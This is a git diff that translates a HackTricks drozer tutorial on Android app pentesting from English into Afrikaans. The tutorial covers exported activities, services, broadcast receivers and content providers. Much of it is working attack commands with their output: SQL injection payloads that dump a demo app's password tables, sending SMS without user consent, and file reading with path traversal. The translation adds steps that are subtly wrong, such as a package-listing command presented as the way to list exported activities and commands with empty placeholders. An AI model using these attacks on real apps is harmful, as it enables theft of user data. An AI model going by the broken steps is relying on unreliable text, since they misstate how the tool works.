Op hierdie oomblik is dit [hierdie](https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk). ```bash adb install drozer.apk ``` +### Begin die Bediener -### Starting the Server - -Agent is running on port 31415, we need to [port forward](https://en.wikipedia.org/wiki/Port\_forwarding) to establish the communication between the Drozer Client and Agent, here is the command to do so: - +Agent loop op poort 31415, ons moet [poort deurstuur](https://af.wikipedia.org/wiki/Poort_deurstuur) om die kommunikasie tussen die Drozer-kliënt en Agent te vestig, hier is die opdrag om dit te doen: ```bash adb forward tcp:31415 tcp:31415 ``` - -Finally, **launch** the **application** and press the bottom "**ON**" +Uiteindelik, **begin** die **toepassing** en druk die "**ON**" knoppie ![](<../../../.gitbook/assets/image (63).png>) -And connect to it: - +En maak daarmee verbinding: ```bash drozer console connect ``` +## Interessante Opdragte -## Interesting Commands - -| **Commands** | **Description** | +| **Opdragte** | **Beskrywing** | | --------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------ | -| **Help MODULE** | Shows help of the selected module | -| **list** | Shows a list of all drozer modules that can be executed in the current session. This hides modules that you don’t have appropriate permissions to run. | -| **shell** | Start an interactive Linux shell on the device, in the context of the Agent. | -| **clean** | Remove temporary files stored by drozer on the Android device. | -| **load** | Load a file containing drozer commands and execute them in sequence. | -| **module** | Find and install additional drozer modules from the Internet. | -| **unset** | Remove a named variable that drozer passes to any Linux shells that it spawns. 
| -| **set** | Stores a value in a variable that will be passed as an environmental variable to any Linux shells spawned by drozer. | -| **shell** | Start an interactive Linux shell on the device, in the context of the Agent | -| **run MODULE** | Execute a drozer module | -| **exploit** | Drozer can create exploits to execute in the decide. `drozer exploit list` | -| **payload** | The exploits need a payload. `drozer payload list` | +| **Help MODULE** | Toon die hulp van die gekose module | +| **lys** | Toon 'n lys van alle drozer modules wat in die huidige sessie uitgevoer kan word. Hierdie verberg modules waarvoor jy nie die nodige toestemmings het om uit te voer nie. | +| **shell** | Begin 'n interaktiewe Linux-skulp op die toestel, in die konteks van die Agent. | +| **skoon** | Verwyder tydelike lêers wat deur drozer op die Android-toestel gestoor word. | +| **laai** | Laai 'n lêer wat drozer-opdragte bevat en voer hulle in volgorde uit. | +| **module** | Vind en installeer addisionele drozer-modules van die internet. | +| **unset** | Verwyder 'n benoemde veranderlike wat drozer aan enige Linux-skulpe wat dit skep, oordra. | +| **stel** | Stoor 'n waarde in 'n veranderlike wat as 'n omgewingsveranderlike aan enige Linux-skulpe wat deur drozer geskep word, oorgedra sal word. | +| **shell** | Begin 'n interaktiewe Linux-skulp op die toestel, in die konteks van die Agent | +| **run MODULE** | Voer 'n drozer-module uit | +| **exploit** | Drozer kan exploits skep om in die toestel uit te voer. `drozer exploit list` | +| **payload** | Die exploits benodig 'n payload. 
`drozer payload list` | -### Package - -Find the **name** of the package filtering by part of the name: +### Pakket +Vind die **naam** van die pakket deur te filtreer op 'n deel van die naam: ```bash -dz> run app.package.list -f sieve +dz> run app.package.list -f sieve com.mwr.example.sieve ``` - -**Basic Information** of the package: - +**Basiese Inligting** van die pakkie: ```bash dz> run app.package.info -a com.mwr.example.sieve Package: com.mwr.example.sieve 
@@ -102,59 +91,67 @@ GID: [1028, 1015, 3003] Shared Libraries: null Shared User ID: null Uses Permissions: - - android.permission.READ_EXTERNAL_STORAGE - - android.permission.WRITE_EXTERNAL_STORAGE - - android.permission.INTERNET +- android.permission.READ_EXTERNAL_STORAGE +- android.permission.WRITE_EXTERNAL_STORAGE +- android.permission.INTERNET Defines Permissions: - - com.mwr.example.sieve.READ_KEYS - - com.mwr.example.sieve.WRITE_KEYS +- com.mwr.example.sieve.READ_KEYS +- com.mwr.example.sieve.WRITE_KEYS ``` - -Read **Manifest**: - +Lees **Manifest**: ```bash run app.package.manifest jakhar.aseem.diva ``` - -**Attack surface** of the package: - +**Aanvalsvlak** van die pakket: ```bash dz> run app.package.attacksurface com.mwr.example.sieve Attack Surface: - 3 activities exported - 0 broadcast receivers exported - 2 content providers exported - 2 services exported - is debuggable +3 activities exported +0 broadcast receivers exported +2 content providers exported +2 services exported +is debuggable ``` +* **Aktiwiteite**: Miskien kan jy 'n aktiwiteit begin en 'n sekere soort outorisasie om dit te begin, omseil wat jou behoort te verhoed om dit te begin. +* **Inhoudsverskaffers**: Miskien kan jy toegang verkry tot private data of 'n sekere kwesbaarheid uitbuit (SQL-injeksie of Padtraversal). +* **Dienste**: +* **is debuggable**: [Leer meer](./#is-debuggeable) -* **Activities**: Maybe you can start an activity and bypass some kind of authorization that should be prevent you from launching it. -* **Content providers**: Maybe you can access private data or exploit some vulnerability (SQL Injection or Path Traversal). 
-* **Services**: -* **is debuggable**: [Learn more](./#is-debuggeable) - -### Activities - -An exported activity component’s “android:exported” value is set to **“true”** in the AndroidManifest.xml file: +### Aktiwiteite +Die "android:exported" waarde van 'n uitgevoerde aktiwiteitskomponent is ingestel op **"true"** in die AndroidManifest.xml-lêer: ```markup ``` +**Lys uitgevoerde aktiwiteite**: -**List exported activities**: +Om die uitgevoerde aktiwiteite in 'n lysformaat te sien, kan jy die volgende stappe volg: +1. Installeer die drozer-agentskakel op die teiken Android-toestel. +2. Maak 'n verbinding met die drozer-agentskakel deur die opdraglyn te gebruik. +3. Voer die volgende opdrag in: `run app.package.list -f`. +4. Die lys van uitgevoerde aktiwiteite sal vertoon word, insluitend die pakketname en aktiwiteitsname. + +Hier is 'n voorbeeld van hoe die uitvoer van die opdrag sal lyk: + +``` +com.example.app/.MainActivity +com.example.app/.LoginActivity +com.example.app/.SettingsActivity +``` + +Hierdie lys toon die pakketname en aktiwiteitsname van die uitgevoerde aktiwiteite in die toepassing. ```bash dz> run app.activity.info -a com.mwr.example.sieve Package: com.mwr.example.sieve - com.mwr.example.sieve.FileSelectActivity - com.mwr.example.sieve.MainLoginActivity - com.mwr.example.sieve.PWList +com.mwr.example.sieve.FileSelectActivity +com.mwr.example.sieve.MainLoginActivity +com.mwr.example.sieve.PWList ``` +**Begin aktiwiteit**: -**Start activity**: - -Maybe you can start an activity and bypass some kind of authorization that should be prevent you from launching it. +Miskien kan jy 'n aktiwiteit begin en 'n soort van outorisering omseil wat jou moet verhoed om dit te begin. {% code overflow="wrap" %} ```bash 
@@ -162,22 +159,20 @@ dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sie ``` {% endcode %} -You can also start an exported activity from **adb**: - -* PackageName is com.example.demo -* Exported ActivityName is com.example.test.MainActivity +Jy kan ook 'n uitgevoerde aktiwiteit vanaf **adb** begin: +* Pakketnaam is com.example.demo +* Uitgevoerde aktiwiteitnaam is com.example.test.MainActivity ```bash adb shell am start -n com.example.demo/com.example.test.MainActivity ``` +### Inhoudbieders -### Content Providers +Hierdie pos was te groot om hier te wees, so **jy kan** [**daarop toegang kry op sy eie bladsy hier**](exploiting-content-providers.md). -This post was so big to be here so **you can** [**access it in its own page here**](exploiting-content-providers.md). +### Dienste -### Services - -A exported service is declared inside the Manifest.xml: +'n Uitgevoerde diens word binne die Manifest.xml verklaar: {% code overflow="wrap" %} ```markup 
@@ -185,152 +180,160 @@ A exported service is declared inside the Manifest.xml: ``` {% endcode %} -Inside the code **check** for the \*\*`handleMessage`\*\*function which will **receive** the **message**: +Binne die kode **kyk** vir die \*\*`handleMessage`\*\*funksie wat die **boodskap** sal **ontvang**: ![](<../../../.gitbook/assets/image (194).png>) -#### List service - +#### Lysdiens ```bash -dz> run app.service.info -a com.mwr.example.sieve +dz> run app.service.info -a com.mwr.example.sieve Package: com.mwr.example.sieve - com.mwr.example.sieve.AuthService - Permission: null - com.mwr.example.sieve.CryptoService - Permission: null +com.mwr.example.sieve.AuthService +Permission: null +com.mwr.example.sieve.CryptoService +Permission: null ``` +#### **Interaksie** met 'n diens -#### **Interact** with a service +To interact with a service, you need to use the `run` command in drozer. This command allows you to execute various modules and actions against the target application. +Om met 'n diens te interaksieer, moet jy die `run`-opdrag in drozer gebruik. Hierdie opdrag stel jou in staat om verskeie modules en aksies teen die teikentoepassing uit te voer. ```bash -app.service.send Send a Message to a service, and display the reply -app.service.start Start Service +app.service.send Send a Message to a service, and display the reply +app.service.start Start Service app.service.stop Stop Service ``` +#### Voorbeeld -#### Example - -Take a look to the **drozer** help for `app.service.send`: +Neem 'n kykie na die **drozer** hulp vir `app.service.send`: ![](<../../../.gitbook/assets/image (196) (1).png>) -Note that you will be sending first the data inside "_msg.what_", then "_msg.arg1_" and "_msg.arg2_", you should check inside the code **which information is being used** and where.\ -Using the `--extra` option you can send something interpreted by "_msg.replyTo"_, and using `--bundle-as-obj` you create and object with the provided details. 
+Let daarop dat jy eers die data binne "_msg.what_", dan "_msg.arg1_" en "_msg.arg2_" sal stuur. Jy moet binne die kode **ondersoek watter inligting gebruik word** en waar.\ +Met behulp van die `--extra` opsie kan jy iets stuur wat geïnterpreteer word deur "_msg.replyTo"_, en deur `--bundle-as-obj` te gebruik, skep jy 'n objek met die verskafte besonderhede. -In the following example: +In die volgende voorbeeld: * `what == 2354` * `arg1 == 9234` * `arg2 == 1` * `replyTo == object(string com.mwr.example.sieve.PIN 1337)` - ```bash run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 1 --extra string com.mwr.example.sieve.PIN 1337 --bundle-as-obj ``` - ![](<../../../.gitbook/assets/image (195).png>) -### Broadcast Receivers +### Uitsaai-Ontvangers -**In the Android basic info section you can see what is a Broadcast Receiver**. +**In die Android basiese inligting afdeling kan jy sien wat 'n Uitsaai-Ontvanger is**. -After discovering this Broadcast Receivers you should **check the code** of them. Pay special attention to the **`onReceive`** function as it will be handling the messages received. - -#### **Detect all** broadcast receivers +Nadat jy hierdie Uitsaai-Ontvangers ontdek het, moet jy **die kode nagaan**. Gee spesiale aandag aan die **`onReceive`** funksie, aangesien dit die ontvangste boodskappe sal hanteer. +#### **Ontdek alle** uitsaai-ontvangers ```bash run app.broadcast.info #Detects all ``` +#### Kontroleer uitsaai-ontvangers van 'n app -#### Check broadcast receivers of an app +Om die uitsaai-ontvangers van 'n Android-app te kontroleer, kan jy die volgende stappe volg: +1. Installeer en begin drozer op jou toestel. +2. Verbind met die toestel deur die `connect`-bevel te gebruik. +3. Voer die volgende bevel in om 'n lys van alle geïnstalleerde pakkette op die toestel te kry: + + ``` + run app.package.list -f + ``` + +4. Identifiseer die pakketnaam van die app wat jy wil ondersoek. +5. 
Voer die volgende bevel in om 'n lys van alle uitsaai-ontvangers van die app te kry: + + ``` + run app.broadcast.info -a + ``` + + Vervang `` met die werklike pakketnaam van die app. + +6. Jy sal 'n lys van uitsaai-ontvangers sien wat deur die app gebruik word, tesame met hul besonderhede soos die ontvangerklas en die uitsaai-intentfilters. + +Deur hierdie stappe te volg, kan jy die uitsaai-ontvangers van 'n Android-app ondersoek en relevante inligting verkry. ```bash #Check one negative run app.broadcast.info -a jakhar.aseem.diva Package: jakhar.aseem.diva - No matching receivers. +No matching receivers. # Check one positive run app.broadcast.info -a com.google.android.youtube Package: com.google.android.youtube - com.google.android.libraries.youtube.player.PlayerUiModule$LegacyMediaButtonIntentReceiver - Permission: null - com.google.android.apps.youtube.app.common.notification.GcmBroadcastReceiver - Permission: com.google.android.c2dm.permission.SEND - com.google.android.apps.youtube.app.PackageReplacedReceiver - Permission: null - com.google.android.libraries.youtube.account.AccountsChangedReceiver - Permission: null - com.google.android.apps.youtube.app.application.system.LocaleUpdatedReceiver - Permission: null +com.google.android.libraries.youtube.player.PlayerUiModule$LegacyMediaButtonIntentReceiver +Permission: null +com.google.android.apps.youtube.app.common.notification.GcmBroadcastReceiver +Permission: com.google.android.c2dm.permission.SEND +com.google.android.apps.youtube.app.PackageReplacedReceiver +Permission: null +com.google.android.libraries.youtube.account.AccountsChangedReceiver +Permission: null +com.google.android.apps.youtube.app.application.system.LocaleUpdatedReceiver +Permission: null ``` - -#### Broadcast **Interactions** - +#### Uitsaai **Interaksies** ```bash -app.broadcast.info Get information about broadcast receivers -app.broadcast.send Send broadcast using an intent +app.broadcast.info Get information about broadcast receivers 
+app.broadcast.send Send broadcast using an intent app.broadcast.sniff Register a broadcast receiver that can sniff particular intents ``` +#### Stuur 'n boodskap -#### Send a message - -In this example abusing the [FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk) Content Provider you can **send an arbitrary SMS** any non-premium destination **without asking** the user for permission. +In hierdie voorbeeld misbruik die [FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk) Inhoudsverskaffer kan jy **'n willekeurige SMS stuur** na enige nie-premium bestemming **sonder om** die gebruiker om toestemming te vra. ![](<../../../.gitbook/assets/image (199).png>) ![](<../../../.gitbook/assets/image (197) (1).png>) -If you read the code, the parameters "_phoneNumber_" and "_message_" must be sent to the Content Provider. - +As jy die kode lees, moet die parameters "_phoneNumber_" en "_message_" na die Inhoudsverskaffer gestuur word. ```bash run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers SendSMSNowReceiver --extra string phoneNumber 123456789 --extra string message "Hello mate!" ``` +### Is debugeerbaar -### Is debuggeable - -A prodduction APK should never be debuggeable.\ -This mean that you can **attach java debugger** to the running application, inspect it in run time, set breakpoints, go step by step, gather variable values and even change them.[ InfoSec institute has an excellent article](../exploiting-a-debuggeable-applciation.md) on digging deeper when you application is debuggable and injecting runtime code. - -When an application is debuggable, it will appear in the Manifest: +'n Produksie APK moet nooit debugeerbaar wees nie. 
Dit beteken dat jy 'n Java debugeerder kan koppel aan die lopende toepassing, dit in uitvoertyd kan ondersoek, breekpunte kan stel, stap vir stap kan gaan, veranderlike waardes kan versamel en selfs kan verander. [InfoSec-instituut het 'n uitstekende artikel](../exploiting-a-debuggeable-application.md) oor dieper graafwerk wanneer jou toepassing debugeerbaar is en in uitvoertyd kode inspuit. +Wanneer 'n toepassing debugeerbaar is, sal dit in die manifest verskyn: ```xml -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty platform geskep deur hackers, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings te verdien tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md index 30de62327..ae4762be3 100644 --- a/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md +++ b/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md @@ -1,102 +1,95 @@ -# Exploiting Content Providers +# Uitbuiting van Inhoudsverskaffers -## Exploiting Content Providers +## Uitbuiting van Inhoudsverskaffers
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
-## Intro +## Inleiding -Data is **supplied from one application to others** on request by a component known as a **content provider**. These requests are managed through the **ContentResolver class** methods. Content providers can store their data in various locations, such as a **database**, **files**, or over a **network**. - -In the _Manifest.xml_ file, the declaration of the content provider is required. For instance: +Data word **verskaf van die een toepassing na die ander** op versoek deur 'n komponent wat bekend staan as 'n **inhoudsverskaffer**. Hierdie versoek word hanteer deur die metodes van die **ContentResolver-klas**. Inhoudsverskaffers kan hul data in verskillende plekke stoor, soos 'n **databasis**, **lêers**, of oor 'n **netwerk**. +In die _Manifest.xml_ lêer is die verklaring van die inhoudsverskaffer vereis. Byvoorbeeld: ```xml - + ``` +Om toegang te verkry tot `content://com.mwr.example.sieve.DBContentProvider/Keys`, is die `READ_KEYS` toestemming nodig. Dit is interessant om op te merk dat die pad `/Keys/` toeganklik is in die volgende afdeling, wat nie beskerm is as gevolg van 'n fout deur die ontwikkelaar nie, wat `/Keys` beveilig het, maar `/Keys/` verklaar het. -To access `content://com.mwr.example.sieve.DBContentProvider/Keys`, the `READ_KEYS` permission is necessary. It's interesting to note that the path `/Keys/` is accessible in the following section, which is not protected due to a mistake by the developer, who secured `/Keys` but declared `/Keys/`. 
- -**Maybe you can access private data or exploit some vulnerability (SQL Injection or Path Traversal).** - -## Get info from **exposed content providers** +**Miskien kan jy privaat data verkry of 'n kwesbaarheid uitbuit (SQL-injeksie of padtraversal).** +## Kry inligting van **blootgestelde inhoudverskaffers** ``` -dz> run app.provider.info -a com.mwr.example.sieve - Package: com.mwr.example.sieve - Authority: com.mwr.example.sieve.DBContentProvider - Read Permission: null - Write Permission: null - Content Provider: com.mwr.example.sieve.DBContentProvider - Multiprocess Allowed: True - Grant Uri Permissions: False - Path Permissions: - Path: /Keys - Type: PATTERN_LITERAL - Read Permission: com.mwr.example.sieve.READ_KEYS - Write Permission: com.mwr.example.sieve.WRITE_KEYS - Authority: com.mwr.example.sieve.FileBackupProvider - Read Permission: null - Write Permission: null - Content Provider: com.mwr.example.sieve.FileBackupProvider - Multiprocess Allowed: True - Grant Uri Permissions: False +dz> run app.provider.info -a com.mwr.example.sieve +Package: com.mwr.example.sieve +Authority: com.mwr.example.sieve.DBContentProvider +Read Permission: null +Write Permission: null +Content Provider: com.mwr.example.sieve.DBContentProvider +Multiprocess Allowed: True +Grant Uri Permissions: False +Path Permissions: +Path: /Keys +Type: PATTERN_LITERAL +Read Permission: com.mwr.example.sieve.READ_KEYS +Write Permission: com.mwr.example.sieve.WRITE_KEYS +Authority: com.mwr.example.sieve.FileBackupProvider +Read Permission: null +Write Permission: null +Content Provider: com.mwr.example.sieve.FileBackupProvider +Multiprocess Allowed: True +Grant Uri Permissions: False ``` +Dit is moontlik om te bepaal hoe om die **DBContentProvider** te bereik deur URIs te begin met "_content://_". Hierdie benadering is gebaseer op insigte wat verkry is deur Drozer te gebruik, waar sleutelinligting in die _/Keys_ gids gevind is. 
-It's possible to piece together how to reach the **DBContentProvider** by starting URIs with “_content://_”. This approach is based on insights gained from using Drozer, where key information was located in the _/Keys_ directory. - -Drozer can **guess and try several URIs**: - +Drozer kan **veral URIs raai en probeer**: ``` -dz> run scanner.provider.finduris -a com.mwr.example.sieve +dz> run scanner.provider.finduris -a com.mwr.example.sieve Scanning com.mwr.example.sieve... Unable to Query content://com.mwr.example.sieve.DBContentProvider/ -... -Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys +... +Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys Accessible content URIs: content://com.mwr.example.sieve.DBContentProvider/Keys/ content://com.mwr.example.sieve.DBContentProvider/Passwords content://com.mwr.example.sieve.DBContentProvider/Passwords/ ``` - -You should also check the **ContentProvider code** to search for queries: +Jy moet ook die **ContentProvider-kode** nagaan om na navrae te soek: ![](<../../../.gitbook/assets/image (121) (1) (1) (1).png>) -Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method: +As jy nie volledige navrae kan vind nie, kan jy **nagaan watter name deur die ContentProvider verklaar word** in die `onCreate`-metode: ![](<../../../.gitbook/assets/image (186).png>) -The query will be like: `content://name.of.package.class/declared_name` +Die navraag sal wees: `content://name.of.package.class/declared_name` -## **Database-backed Content Providers** +## **Databasis-ondersteunde Content Providers** -Probably most of the Content Providers are used as **interface** for a **database**. Therefore, if you can access it you could be able to **extract, update, insert and delete** information.\ -Check if you can **access sensitive information** or try to change it to **bypass authorisation** mechanisms. 
+Waarskynlik word die meeste Content Providers gebruik as **koppelvlak** vir 'n **databasis**. Daarom, as jy toegang daartoe kan verkry, kan jy inligting **onttrek, opdateer, invoeg en verwyder**.\ +Kyk of jy **gevoelige inligting kan ontsluit** of probeer dit verander om **outoriseringsmeganismes te omseil**. -When checking the code of the Content Provider **look** also for **functions** named like: _query, insert, update and delete_: +Wanneer jy die kode van die Content Provider nagaan, soek ook na **funksies** met name soos: _query, insert, update en delete_: ![](<../../../.gitbook/assets/image (187).png>) ![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1).png>) -Because you will be able to call them - -### Query content +Omdat jy hulle kan aanroep +### Navraaginhoud ``` dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical _id: 1 
@@ -106,106 +99,134 @@ password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== - email: incognitoguy50@gmail.com ``` +### Voeg inhoud in -### Insert content - -Quering the database you will learn the **name of the columns**, then, you could be able to insert data in the DB: +Deur die databasis te ondervra, sal jy die **naam van die kolomme** leer, dan sal jy in staat wees om data in die DB in te voeg: ![](<../../../.gitbook/assets/image (188) (1).png>) ![](<../../../.gitbook/assets/image (189) (1).png>) -_Note that in insert and update you can use --string to indicate string, --double to indicate a double, --float, --integer, --long, --short, --boolean_ +_Merk op dat jy in die invoeging en opdatering --string kan gebruik om 'n string aan te dui, --double om 'n dubbel te dui, --float, --integer, --long, --short, --boolean_ -### Update content +### Werk inhoud by -Knowing the name of the columns you could also **modify the entries**: +Deur die naam van die kolomme te ken, kan jy ook die inskrywings **verander**: ![](<../../../.gitbook/assets/image (190).png>) -### Delete content +### Verwyder inhoud ![](<../../../.gitbook/assets/image (191).png>) -### **SQL Injection** +### **SQL-injectie** -It is simple to test for SQL injection **(SQLite)** by manipulating the **projection** and **selection fields** that are passed to the content provider.\ -When quering the Content Provider there are 2 interesting arguments to search for information: _--selection_ and _--projection_: +Dit is maklik om vir SQL-injectie te toets **(SQLite)** deur die **projeksie** en **seleksieveld** wat aan die inhoudverskaffer oorgedra word, te manipuleer.\ +Wanneer jy die Inhoudverskaffer ondervra, is daar 2 interessante argumente om na inligting te soek: _--selection_ en _--projection_: ![](<../../../.gitbook/assets/image (192) (1).png>) -You can try to **abuse** this **parameters** to test for **SQL injections**: - +Jy kan probeer om hierdie **parameters** te **misbruik** om vir **SQL-injecties** te toets: 
``` -dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'" +dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'" unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (') ``` ``` -dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* -FROM SQLITE_MASTER WHERE type='table';--" +dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* +FROM SQLITE_MASTER WHERE type='table';--" | type | name | tbl_name | rootpage | sql | -| table | android_metadata | android_metadata | 3 | CREATE TABLE ... | +| table | android_metadata | android_metadata | 3 | CREATE TABLE ... | | table | Passwords | Passwords | 4 | CREATE TABLE ... | ``` +**Outomatiese SQLInjection-ontdekking deur Drozer** -**Automatic SQLInjection discovery by Drozer** +Drozer is 'n kragtige hulpmiddel wat gebruik kan word vir die outomatiese ontdekking van SQLInjection-foute in Android-toepassings. Hierdie tegniek maak gebruik van die ingeboude funksionaliteit van Drozer om die inhoudverskaffers van 'n toepassing te ondersoek en potensiële SQLInjection-punte te identifiseer. +Om hierdie tegniek te gebruik, moet jy Drozer op jou toestel installeer en die toepassing wat jy wil ondersoek, geïnstalleer hê. Volg dan hierdie stappe: + +1. Begin deur Drozer op jou toestel te begin deur die volgende opdrag in die opdragreël in te voer: + ``` + drozer console connect + ``` + +2. Nadat jy suksesvol met die Drozer-konsole verbind het, kan jy die volgende opdrag gebruik om die inhoudverskaffers van die toepassing te lys: + ``` + run app.provider.find + ``` + +3. Kyk na die lys van inhoudverskaffers wat deur Drozer verskaf word en identifiseer die toepassing wat jy wil ondersoek. + +4. 
Gebruik die volgende opdrag om die inhoudverskaffer te ondersoek en potensiële SQLInjection-punte te identifiseer: + ``` + run app.provider.query content:// --projection --selection --selectionArgs + ``` + + Vervang `` met die URI van die inhoudverskaffer wat jy wil ondersoek. Vervang `` met die kolomnaam wat jy wil ondersoek. Vervang `` met die seleksievoorwaarde en `` met die seleksie-argumente wat jy wil gebruik. + +5. Drozer sal die resultate van die navraag vertoon en enige potensiële SQLInjection-punte aandui. + +Deur hierdie stappe te volg, kan jy Drozer gebruik om outomaties SQLInjection-foute in Android-toepassings te ontdek en te identifiseer. Dit is 'n kragtige tegniek wat jou kan help om die veiligheid van 'n toepassing te beoordeel en potensiële kwesbaarhede te identifiseer. ``` -dz> run scanner.provider.injection -a com.mwr.example.sieve -Scanning com.mwr.example.sieve... +dz> run scanner.provider.injection -a com.mwr.example.sieve +Scanning com.mwr.example.sieve... Injection in Projection: - content://com.mwr.example.sieve.DBContentProvider/Keys/ - content://com.mwr.example.sieve.DBContentProvider/Passwords - content://com.mwr.example.sieve.DBContentProvider/Passwords/ +content://com.mwr.example.sieve.DBContentProvider/Keys/ +content://com.mwr.example.sieve.DBContentProvider/Passwords +content://com.mwr.example.sieve.DBContentProvider/Passwords/ Injection in Selection: - content://com.mwr.example.sieve.DBContentProvider/Keys/ - content://com.mwr.example.sieve.DBContentProvider/Passwords - content://com.mwr.example.sieve.DBContentProvider/Passwords/ - +content://com.mwr.example.sieve.DBContentProvider/Keys/ +content://com.mwr.example.sieve.DBContentProvider/Passwords +content://com.mwr.example.sieve.DBContentProvider/Passwords/ + dz> run scanner.provider.sqltables -a jakhar.aseem.diva Scanning jakhar.aseem.diva... 
Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/: - android_metadata - notes - sqlite_sequence +android_metadata +notes +sqlite_sequence ``` +## **Lêerstelsel-gebaseerde Inhoudsverskaffers** -## **File System-backed Content Providers** - -Content providers could be also used to **access files:** +Inhoudsverskaffers kan ook gebruik word om toegang tot lêers te verkry: ![](<../../../.gitbook/assets/image (193).png>) -### Read **file** - -You can read files from the Content Provider +### Lees **lêer** +Jy kan lêers van die Inhoudsverskaffer lees. ``` -dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts +dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts 127.0.0.1 localhost ``` +### **Pad Traversal** -### **Path Traversal** - -If you can access files, you can try to abuse a Path Traversal (in this case this isn't necessary but you can try to use "_../_" and similar tricks). - +As jy toegang tot lêers het, kan jy probeer om 'n Pad Traversal te misbruik (in hierdie geval is dit nie nodig nie, maar jy kan probeer om "_../_" en soortgelyke truuks te gebruik). ``` 